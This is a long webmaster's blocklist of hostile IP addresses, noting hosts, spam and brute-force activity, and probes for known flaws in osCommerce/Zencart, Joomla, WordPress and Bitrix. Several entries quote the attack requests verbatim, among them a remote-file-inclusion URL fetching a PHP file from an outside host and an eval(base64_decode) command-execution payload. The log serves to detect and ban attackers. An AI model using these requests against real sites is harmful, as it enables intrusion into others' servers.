Shared hosting web server: 5 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
174.142.104.119 Host: Canada – Montreal Iweb Dedicated Cl
Shared hosting web server: 4 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
72.249.126.33 Hostname: loencuentroporti.com
Host: United States – Ochelata Networld Internet Services
Shared hosting web server: 23 websites
Looking for admin exploit
/admin/administrators.php/login.php
216.150.224.199 Hostname: mail1.wansol.net
Host: United States – Royal Oak Advanced Data Systems
Looking for known Joomla Open Flash Chart exploit:
//administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=xxx.php
82.193.109.52 Hostname: 82.193.109.52.ipnet.kiev.ua
Host: Ukraine – Kiev Zat Industrial Media Network
Comment spammer
Bad host
188.40.151.148 Hostname: static.148.151.40.188.clients.your-server.de
Host: Germany – Hamburg Ebla It
Hetzner Online AG
Shared hosting web server: 6 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
85.31.196.160 Hostname: jn478.jn-hebergement.com
Host: France – Marseille Jaguar Network Sas
Shared hosting web server: 7 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
192.73.244.56 Hostname: lvps94-136-55-143.vps.webfusion.co.uk
Host: United Kingdom – Derby Webfusion Internet Solutions
Shared hosting web server: 13 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
37.157.192.169 Hostname: one.zenart.cz
Host: Czech Republic – Hluboka Nad Vltavou Wedos Hosting Services
Shared hosting web server: 50 websites
Looking for known Joomla JCE editor exploit
//images/stories/xfile.gif
151.237.186.7 Host: Sweden – Stockholm Deepak Mehta Fie Registration bot
Bad host: Deepak Mehta Fie
130.185.157.8 Host: United States – Waynesville Deepak Mehta Fie
Web server: 1 website – daunenjackemonclersoutlet.com
Running registration bot
94.126.19.212 Hostname: mignon3.ch-meta.net
Host: Switzerland – Zurich Metanet Ag
Web server: 1 website – exo-fashion.ch
Remote File Inclusion probe / WordPress timthumb RFI exploit:
/wp-content/themes/Aggregate/thumb.php?src=
http: //picasa.com.blackwellbusiness.com/bad.php
111.223.252.93 Hostname: hosting.unpad.ac.id
Host: Indonesia – Bandung Universitas Padjadjaran
Shared hosting web server: 3 websites
Remote File Inclusion probe / WordPress timthumb RFI exploit:
/wp-content/themes/Aggregate/thumb.php?src=
http: //picasa.com.blackwellbusiness.com/bad.php
216.244.71.194 Host: United States – Seattle Private Customer Comment spammer
87.118.124.67 Hostname: ns.km33204-01.keymachine.de
Host: Germany – Erfurt Keyweb Ag
Shared hosting web server: 3 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
70.38.109.89 Hostname: northboundlive.com
Host: Canada – Montreal Northbound Leather
Shared hosting web server: 3 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
151.11.24.39 Host: Italy – Milano Istituto Agronomico Mediterraneo
Shared hosting server – 4 websites
Looking for Joomla exploit:
/images/stories/3xp.php
188.3.56.143 Host: Turkey – Istanbul Koc.net Dsl Istanbul Trying to login to WordPress /wp-login.php on Drupal site
Bad host
88.245.165.221 Hostname: 88.245.165.221.dynamic.ttnet.com.tr
Host: Turkey – Kutahya Turk Telekomunikasyon Anonim Sirketi
Looking for admin exploit:
/administrator/index.php
82.165.25.114 Host: Germany – Karlsruhe 1&1 Internet Ag
Shared hosting web server: 10 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
46.119.115.36 Hostname: SOL-FTTB.36.115.119.46.sovam.net.ua
Host: Ukraine – Kiev Golden Telecom
Comment spammer
Bad host
82.165.25.35 Hostname: s15925353.onlinehome-server.info
Host: Germany – Karlsruhe 1&1 Internet Ag
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
87.106.191.117 Hostname: s15432125.onlinehome-server.info
Host: Germany – Karlsruhe 1&1 Internet Ag
Shared hosting web server: 41 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
64.235.53.5 Hostname: lasvegas-nv-datacenter.com
Host: United States – Las Vegas Las Vegas Nv Datacenter
Web server: suncoastlearning.net
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
172.245.214.242 Host: United States – Sellersville Aslan Investments Llc
ColoCrossing
Comment spammer
64.145.83.176 Hostname: 83-0ae9378-egi.ultraresponse.net
Host: United States – San Jose Egihosting
Bad registration attempt:
/content/index.php?option=com_user&task=register
&view=register
Malicious user agent:
Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0)
Opera 7.02 Bork-edition [en]
37.59.164.83 Host: France – Roubaix Ovh Systems Bad host
Comment spammer
50.9.184.223 Hostname: 50-9-184-223.los.clearwire-wmx.net
Host: United States – Los Angeles Clear Wireless Llc
Brute force / dictionary attack on admin
/admin/login.php
208.88.6.159 Hostname: corebulk.com
Host: Canada – Toronto Cirrus Tech. Ltd.
Web server: winnerpalace.com , winnerpalace.net
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
85.214.121.79 Hostname: opendots.net
Host: Germany – Berlin Strato Ag
Shared hosting web server: 3 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
94.199.204.15 Hostname: corebulk.com
Host: Izmit Aerotek Bilisim Taahhut Sanayi Ve Ticaret Limited Sirketi
Web server: corebulk.com
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
93.187.201.115 Hostname: mail.sadearge.com
Host: Turkey – Izmir Netdirekt A.s.
Shared hosting web server: 28 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
82.165.138.253 Hostname: s15931981.onlinehome-server.info
Host: Germany – Karlsruhe 1&1 Internet Ag
Shared hosting web server: 5 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
74.208.102.248 Hostname: s15357523.onlinehome-server.com
Host: United States – Wayne 1&1 Internet Inc.
Shared hosting web server: 6 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
163.27.222.195 Host: Taiwan – Taipei Moec Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
82.229.150.170 Hostname: mon75-7-82-229-150-170.fbx.proxad.net
Host: France – Montpellier Proxad/free Sas
Web server – website: smartplaces.biz
81.57.153.144 Hostname: cpy94-1-81-57-153-144.fbx.proxad.net
Host: France – Cepoy Proxad/free Sas
Some kind of bot – crawled site looking for non-existent URLs.
UA: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.110 Safari/537.36 Squider/0.01
This UA is not a genuine browser
94.123.227.51 Host: Turkey – Istanbul Dogan Tv Digital Platform Isletmeciligi A.s Dictionary attacker looking for admin exploit
142.4.209.168 Hostname: ks4003314.ip-142-4-209.net
Host: Canada – Montreal Ovh Hosting Inc.
Looking for WordPress plugin readme.txt files
Looking for vulnerable version of Simple Dropbox Upload Form plugin
151.236.43.41 Hostname: beta.imcconseil.fr
Host: United Kingdom – Maidenhead Simply Transit Ltd
Shared hosting web server: 20 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
85.97.158.40 Hostname: 85.97.158.40.dynamic.ttnet.com.tr
Host: Turkey – Ankara Turk Telekomunikasyon Anonim Sirketi
Brute force / dictionary attack on admin
/admin/login.php
bitrix/admin/index.php
198.211.112.21 Hostname: kruk.skiltech.com
Host: Canada – Toronto Digital Ocean Inc.
Shared hosting web server: 11 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
192.184.37.126 Hostname: unassigned.psychz.net
Host: United States – Walnut Psychz Networks
Comment spammer
Bad host: Psychz Networks
198.245.63.133 Hostname: ns4000804.ip-198-245-63.net
Host: Canada – Montreal Ovh Hosting Inc
Comment spammer
Bad host: Ovh Systems
184.173.243.3 Hostname: atlantic.ourhostingservers.com
Host: United States – Houston Theplanet.com Internet Services Inc.
Shared hosting web server: 465 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
108.171.197.226 Hostname: galaxy.wznoc.com
Host: United States – Los Angeles Webnx Inc.
Shared hosting web server: 894 websites
Looking for known exploit vulnerability
/wp-content/plugins/lazy-seo/lazyseo.php
37.57.25.225 Host: Ukraine – Kharkiv Tov Bank-inform Hacker probing for vulnerabilities
/webalizer/usage_201309.html
/administrator/index.php
203.88.117.217 Hostname: woylie.cbr.hosting-server.com.au
Host: Australia – Braddon Uberglobal Ubrcbrvl
Shared hosting web server: 351 websites
Looking for known exploit vulnerability
/wp-content/plugins/lazy-seo/lazyseo.php
173.208.133.226 Host: United States – Kansas City Wholesale Internet Inc.
Web server: 1 website – yir.cc
Looking for known exploit vulnerability
/wp-content/plugins/user-meta/framework/helper/
92.135.56.63 Hostname: ANantes-654-1-41-63.w92-135.abo.wanadoo.fr
Host: France – Nantes Orange S.a.
Looking for very old (more than 2 yrs) removed links.
200.148.94.78 Hostname: 200-148-94-78.dsl.telesp.net.br
Host: Brazil – Sao Paulo Telefonica Brasil S.a
Mail server, dictionary attacker, comment spammer
142.0.134.89 Host: United States – San Jose Vpsbus
PEGTECHINC – PEG TECH INC
Comment spammer
Bad host: PEGTECHINC
82.165.157.236 Hostname: s15752903.onlinehome-server.info
Host: Germany – Karlsruhe 1&1 Internet Ag
Web server: 1 website – urbangreenline.org
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
94.23.63.174 Hostname: ks3097743.kimsufi.com
Host: France – Roubaix Ovh Systems
Comment spammer
Bad host: Ovh Systems
199.15.233.133 Host: United States – Fort Worth Julian Roskilly Comment spammer / Rule breaker
Bad host:
108.59.255.124 Hostname: vps-1051735-4354.manage.myhosting.com
Host: United States – Pittsford Softcom America Inc.
Web server: 1 website – setestdomain.com
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
62.173.123.121 Hostname: unallocated.star.net.uk
Host: United Kingdom – Barnet Vax Ltd
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
88.190.62.117
88.190.62.120
88.190.62.105
Hostname: 88-190-62-117.rev.poneytelecom.eu
Host: France – Paris Dedibox Sas
Comment spammer
Bad host
204.155.149.27 Host: United States – North Richland Hills Dfw Internet Services Inc.
Web server: 1 website – moonsearchtest.com
Mail server
188.143.234.127 Host: Russian Federation – Saint Petersburg Petersburg Internet Network Ltd Comment spammer
Very high threat rating
162.216.4.104 Hostname: 162-216-4-104.static.hvvc.us
Host: United States – Tampa Noc4hosts Inc.
Shared hosting web server: 24 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
Looking for known Joomla exploit:
//images/stories/wp-includes/wp-mails.php?clone
/option=com_jce&task=plugin&plugin=imgmanage
203.183.65.152 Hostname: ns.work-wheels.jp
Host: Japan – Wadax Inc
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
195.137.212.149 Hostname: basicbox15.server-home.net
Host: Germany – Dortmund Markus Bach Betriebs Gmbh
Shared hosting web server: 289 websites
Looking for known exploit vulnerability in WordPress MM Forms Community plugin:
/backwpup-plugin-guide/wp-content/plugins/mm-forms-community/includes/doajaxfileupload.php
Bad host
64.207.154.180 Hostname: benchmarkdisplays.com
Host: United States – Culver City Media Temple Inc.
Shared hosting web server: 5 websites
Looking for Joomla JCE editor RFI exploit
//images/stories/3xp.phpv
37.72.190.104 Host: United States – Carolina Deepak Mehta Fie Comment spammer
208.177.76.26 Host: United States – Herndon Xo Communications Comment spammer
Bad host
70.32.104.58 Hostname: sojournchurch.com
Host: United States – Moreno Valley Media Temple Inc
Shared hosting web server: 14 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
86.96.226.87
86.96.226.88
Host: United Arab Emirates – Dubai Emirates Telecommunications Corporation Hacker: Very dangerous IP – BAN IT
Bad host
46.105.165.224 Host: France – Roubaix Ovh Systems Bad host: Roubaix Ovh Systems
193.105.210.30 Host: Ukraine – Rivne Fop Budko Dmutro Pavlovuch Comment spammer
Extremely high threat rating – ban it
122.255.96.164 Host: Malaysia – Kuala Lumpur Packet One Networks (m) Sdn Hacker bot looking for Awstats exploit
97.79.239.37 Hostname: 37.239.79.97.gvodatacenter.com
Host: United States – San Antonio Time Warner Cable Internet Llc
Shared hosting web server: 17 websites
Trying to exploit WordPress admin on Drupal site
Love these IDIOTS who try WordPress exploits on my Drupal sites
87.238.192.99 Hostname: sh2099.evanzo-server.de
Host: Germany – Berlin Evanzo E-commerce Gmbh Infrastructure
Shared hosting web server: 3790 websites
1. Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
2. Looking for WordPress is-human plugin exploit
/wp-content/plugins/is-human/engine.php?action=log-reset&error&eval(base64_decode(JHM9cGhwX3VuYW1lKCk7CmVjaG8gJzxicj4nLiRzOwoKZW
NobyAnPGJyPic7CnBhc3N0aHJ1KGlkKTsK))&type=ih_options()
Bad host
195.144.11.132 Hostname: 195-144-11-132.phpnet.fr
Host: France – Grenoble Phpnet France Sarl
Shared hosting web server: 62 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
216.244.85.234 Host: United States – Seattle Private Customer Comment spammer
Very high threat rating – ban it
198.27.65.184 Hostname: ns4004995.ip-198-27-65.net
Host: Canada – Montreal Ovh Hosting Inc.
Web server: 1 website – iblock.in
Trying to sign in to site with non-existent user name
198.2.213.253 Host: United States – San Jose Yu Chen
PEGTECHINC – PEG TECH INC
Comment spammer
Bad host: San Jose Yu Chen
Very high threat rating – ban it
94.142.128.140 Hostname: h-128-140.cssgroup.lv
Host: Latvia – Cesis Sia Css Group
Comment spammer, mail server, dictionary attacker
Very high threat rating – ban it
207.241.237.225
207.241.237.226
207.241.237.229
Hostname: crawl423.us.archive.org
Host: United States – San Francisco Internet Archive
User agents:
Mozilla/5.0 (compatible; archive.org_bot +http://www.archive.org/details/archive.org_bot)
Mozilla/5.0 (compatible; special_archiver/3.1.1 +http://www.archive.org/details/archive.org_bot)
Wayback machine – archive.org spider
Rule breaker – does not read or obey robots.txt
65.99.249.234 Hostname: clara.ftpdns.net
Host: United States – Dallas Realwebhost
Shared hosting web server: 27 websites
Looking for drupal/xmlrpc.php
/content//drupal/xmlrpc.php
Absolutely ridiculous – this spammer’s a moron
88.251.148.143 Turkey – Istanbul Dogan Tv Digital Platform Isletmeciligi A.s Looking for admin exploit
administrator/index.php
Bad host
94.120.69.210 Turkey – Istanbul Dogan Tv Digital Platform Isletmeciligi A.s Dictionary attacker:
Tried to sign in with user name “admin”
Blocked by firewall
144.76.85.241 Hostname: n4g1.007ac9.net
Host: Germany – Berlin Server Block
HETZNER-AS Hetzner Online AG
User agent: Mozilla/5.0 (compatible; SISTRIX Crawler; http: //crawler.sistrix.net/)
Sistrix Crawler
Badly programmed bot
Rule breaker
Resource waster
92.24.135.73 Hostname: host-92-24-135-73.ppp.as43234.net
Host: United Kingdom – Ipswich Opal Telecom Dsl
Looking for wpOnlineStore vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
Using Fake Googlebot agent
77.245.151.239 Hostname: server.noktavis.com
Host: United States – Niobe Niobe Bilisim Teknolojileri Yazilim San. Tic. Ltd. Sti.
Note – This is actually a Turkish IP address
Shared hosting web server: 31 websites
Looking for Joomla JCE editor RFI exploit
//images/stories/0cams.php?rf
/index.php?cid=20&file=imgmanager&option=com_jce&
plugin=imgmanager&task=plugin&version=1576
188.92.77.12 Host: Latvia – Riga Ad Technology Sia Comment spammer – high threat rating
62.109.16.28 Hostname: record.fvds.ru
Host: Russian Federation – Irkutsk Ispsystem Cjsc
Looking for admin exploit
admin/administrators.php/login.php
184.154.124.148 Hostname: host7.server10.vpn999.com
Host: United States – Chicago Singlehop Inc.
Comment spammer
89.200.137.33 Hostname: hughead2.miniserver.com
Host: United Kingdom – Reading Memset Ltd
Shared hosting web server: 19 websites
Looking for Joomla JCE editor RFI exploit
/images/stories/Arab.Indonesia.php?rf
88.235.34.201 Hostname: 88.235.34.201.dynamic.ttnet.com.tr
Host: Turkey – Ankara Turk Telekomunikasyon Anonim Sirketi
Dictionary attacker
Trying to login with user name admin
Bad host
190.95.216.158 Hostname: mail.medikal.com.ec
Host: Poland – Ecuador – Guayaquil Onnet S.a.
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
85.128.142.33 Hostname: akl33.rev.netart.pl
Host: Poland – Warsaw Netart Spolka Akcyjna Spolka Komandytowo-akcyjna
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
190.66.11.58 Hostname: ns4.funandi.edu.co
Host: Colombia – Bogota Colombia Telecomunicaciones S.a. Esp
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
192.99.9.51 Hostname: ns4009405.ip-192-99-9.net
Host: Canada – Montreal Ovh Hosting Inc.
Comment spammer
Bad host
108.61.3.83 Hostname: 108.61.3.83.choopa.net
Host: United States Piscataway Levitan Software
Shared hosting web server: 19 websites
Hacker / bot looking for known exploit in reflex-gallery FileUploader:
/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php
50.2.223.147 Host: United States – Dallas Serverhub Cloud Ovz Dallas Comment spammer – found honeypot trap
37.59.61.39 Hostname: ks3099848.kimsufi.com
Host: France – Roubaix Ovh Systems
Comment spammer – found honeypot trap
Bad host: Roubaix OVH Systems
94.198.160.31 Hostname: 94.198.160.31.static.hosted.by.easyhost.be
Host: Belgium – Gent Easyhost Belgium Network
Shared hosting web server: 43 websites
Trying to exploit WordPress xmlrpc.php
Probable trackback comment spammer
UA: Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)
192.95.16.217 Hostname: ceunico.servergrove.com
Host: Canada – Montreal Ovh
Shared hosting web server: 3 websites – corpsbus.com , dckmembers.com , dividedeye.com
Comment spammer – found honeypot trap
Bad host: OVH Systems
66.135.39.94 Hostname: ceunico.servergrove.com
Host: United States – San Antonio Serverbeach
Shared hosting web server: 11 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
Known hacker user agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
89.121.199.171 Host: Romania – Bucharest Romtelecom S.a.
Web server – 1 website: sscbacau.ro
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
137.175.14.33 United States – San Jose China Outcom-urhosts.net
PEGTECHINC – PEG TECH INC
Comment spammer / Bad host
199.15.233.140 Host: United States – Fort Worth Justin Downing Comment spammer
37.59.202.65 Host: Roubaix Ovh Systems Comment spammer / Bad host
188.143.233.39 Host: Russian Federation – Saint Petersburg Petersburg Internet Network Ltd. Comment spammer
192.74.229.65 Host: United States – San Jose Zhang Meng Comment spammer / Bad host
208.177.76.2 Hostname: 208.177.76.9.ptr.us.xo.net
Host: United States – Herndon Xo Communications
Comment spammer / Bad host
110.211.129.120 Host: China – Beijing China Tietong Telecommunications Corporation Looking for various contact forms
/contact.html
/contact.htm
/contact.jsp
/contact.asp
and variations e.g.
/contactus.php
/contact_us.php
and others – DoS type lookups – about 80 a minute
80.72.33.106 Hostname: imperator.imperium.media.pl
Host: Poland – Warsaw Etop Sp. Z O.o.
Shared hosting web server: 55 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
86.122.106.127 Hostname: 86-122-106-127.rdsnet.ro
Host: Romania – Alexandria Rcs & Rds Residential
Comment spammer
91.213.46.145 Host: Spain – Valencia Businet Scp
Shared hosting web server: 55 websites
Attempted admin hack using known exploit:
/admin/administrators.php/login.php
64.151.226.128 Hostname: nl001.equallogicsolutions.com
Host: Canada – Burnaby In2net Network Inc
Shared hosting web server: 6 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
72.55.140.233 Hostname: host.rege.gr
Host: Canada – Montreal Iweb Dedicated Cl
Web server – 1 website: rege.gr
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
94.136.54.181 Hostname: lvps94-136-54-181.vps.webfusion.co.uk
Host: United Kingdom – Derby Webfusion Internet Solutions
Web server – 2 websites: crystallight.tv , smearfreewindows.com
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
54.251.61.114 Hostname: ec2-54-251-61-114.ap-southeast-1.compute.amazonaws.com
Host: Singapore Amazon.com Inc.
Web server – 1 website: actinginn.com
Nuisance bot:
Gigabot/3.0 (http: //www.gigablast.com/spider.html)
Hacker – Looking for wpOnlineStore / osCommerce / ZenCart exploit vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
69.64.58.58 Hostname: colossus914.startdedicated.com
Host: United States – Saint Louis Hosting Solutions International Inc
Web server – 1 website: nideasoft.com
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
166.63.0.70 Hostname: cloudix.com
Host: United States – Columbus Cloudix.com
Web server – 2 websites: ahsoti.org , aunimun.org
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
190.95.216.158 Hostname: mail.medikal.com.ec
Host: Ecuador – Guayaquil Onnet S.a.
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
192.254.154.251 Hostname: tri.trikalaola.gr
Host: United States – Salt Lake City Websitewelcome.com
Web server – 1 website: trikalaola.gr
Attempting /osCommerce/Zencart php injection hack
/zcadmin/sqlpatch.php/password_forgotten.php?action=execute
/admin/sqlpatch.php/password_forgotten.php?action=execute
4dm1n/product.php/password_forgotten.php
/extras/curltest.php
89.252.107.154 Hostname: culture.natm.ru
Host: Russian Federation – Velikiy Novgorod Novgorod Datacom
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
89.221.250.18 Hostname: www18.aname.net
Host: Sweden – Helsingborg Fsd Internet Tjanster Ab
Shared hosting web server: 366 websites
Attempted admin hack using known exploit
87.238.192.71 Hostname: sh2071.evanzo-server.de
Host: Germany – Berlin Evanzo E-commerce Gmbh Infrastructure
Shared hosting web server: 1395 websites
Hacker:
looking for Joomla JCE Remote File Upload Vulnerability – images/stories/3xp.php
67.23.2.106 Host: United States – Dallas Rackspace Cloud Servers
Web server: 4 websites – demvolctr.com , demvolctr.org , scc-mta.com , scc-mta.org
Hacker: Looking for Joomla JCE editor RFI exploit
142.0.128.24 Host: United States – San Jose Yundc
PEGTECHINC – PEG TECH INC
Web server: 4 junk websites – bjlgis.pw , bjlock.pw , bjlqbe.pw , bjlscg.pw
Comment spammer
Bad host: PEGTECHINC
88.224.29.99 Hostname: 88.224.29.99.dynamic.ttnet.com.tr
Host: Turkey – Ankara Turk Telekomunikasyon Anonim Sirketi
Hackerbot looking for Bitrix exploit
/administrator/index.php
/admin.php
/admin/index.php
/user/
/bitrix/admin/index.php?lang=en
95.51.202.241 Hostname: ohw241.internetdsl.tpnet.pl
Host: Poland – Kamien Pomorski Static Ip
Dictionary / Brute force login attacker
69.164.111.198 Host: United States – Alpharetta Secure Computing Corp. … Fka Site scraper
91.203.4.49 Host: Ukraine – Kiev Denis Pavlovich Semenyuk
Shared hosting web server: 9 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
68.171.208.82 Hostname: tsdapps.net
Host: United States – Waterville Acenet Inc.
Shared hosting web server: 170 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
80.53.255.42 Hostname: main.anchor.com.pl
Host: Poland – Warsaw Static Ip
Shared hosting web server: 4 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
Malicious user agent: libwww-perl/5.813
89.33.97.30 Hostname: user-89.33.97.30.mitnet.ro
Host: Romania – Bucharest Sc Millennium It Srl
Shared hosting web server: 54 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
188.165.137.225 Host: France – Roubaix Ovh Systems Trying to login/register
Bad host: Roubaix Ovh Systems
184.22.211.146 Hostname: abcd-burst2.yasni.de
Host: United States – Ohio Network Operations Center Inc
Trying to hotlink to downloads
190.147.27.202 Hostname: Static-IP-cr19014727202.cable.net.co
Host: Colombia – Pasto Telmex Colombia S.a.
Comment spammer
Tried to add content – /node/add
88.208.193.145 Hostname: server88-208-193-145.live-servers.net
Host: United Kingdom – Gloucester Fast Hosts Ltd
Shared hosting web server: 38 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
195.186.81.74 Hostname: 74-81-186-195.bluewin.ch
Host: Switzerland – Zurich Bluewin Is An Internet Service Provider In Ch.
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
174.36.137.189 Hostname: 174.36.137.189-static.reverse.softlayer.com
United States – Seattle Softlayer Technologies Inc.
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
199.19.72.90 Host: United States – Minneapolis Vegasnap Llc DDoS attacker – over 400 attempts in 2 minutes to post comments
Comment spammer
94.23.66.134 Hostname: kin3.nextware.eu
